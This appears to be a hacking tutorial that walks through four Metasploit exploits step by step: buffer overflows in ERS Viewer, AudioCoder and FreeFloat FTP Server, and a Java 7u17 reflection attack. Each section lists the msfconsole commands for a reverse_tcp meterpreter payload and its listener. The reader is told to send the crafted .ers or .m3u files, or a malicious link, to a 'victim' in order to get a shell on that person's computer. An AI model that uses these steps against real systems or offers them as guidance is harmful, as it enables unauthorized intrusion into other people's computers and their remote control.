Exploit Remote Windows PC using ERS Viewer 2011 ERS File Handling Buffer Overflow

This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the functionERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.

Exploit Targets

ERS Viewer 2011 (v11.04)

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/erdas_er_viewer_bof

msf exploit (erdas_er_viewer_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (erdas_er_viewer_bof)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (erdas_er_viewer_bof)>exploit

After we successfully generate the malicious ers File, it will stored on your local computer

/root/.msf4/local/msf.ers

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

exploit

Now send your msf.ers files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Windows PC using AudioCoder .M3U Buffer Overflow

This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.

Exploit Targets

Audio Code 0.8.18

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/audio_coder_m3u

msf exploit (audio_coder_m3u)>set payload windows/meterpreter/reverse_tcp

msf exploit (audio_coder_m3u)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (audio_coder_m3u)>exploit

After we successfully generate the malicious m3u File, it will stored on your local computer

/root/.msf4/local/msf.m3u

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

 

Hack Remote Windows, Linux or MAC PC using Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

Java 7 Update 17

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_jre17_reflection_types

msf exploit (java_jre17_reflection_types)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (java_jre17_reflection_types)>set target 1

msf exploit (java_jre17_reflection_types)>set srvhost 192.168.0.106 (This must be an address on the local

msf exploit (java_jre17_reflection_types)>set payload windows/meterpreter/reverse_tcp

machine)

msf exploit (java_jre17_reflection_types)>exploit

Now an URL you should give to your victim //192.168.1.0.106:8080/Mt7fUKs955I

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Exploit Windows PC using Free Float FTP Server USER Command Buffer Overflow

Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted ‘USER’ command, a remote attacker can potentially have an unspecified impact.

Exploit Targets

FreeFloat FTP Server

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/ftp/freefloatftp_user

msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp

msf exploit (freefloatftp_user)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (freefloatftp_user)>set rhost 192.168.0.110 (IP Address of Victim PC)

msf exploit (freefloatftp_user)>exploit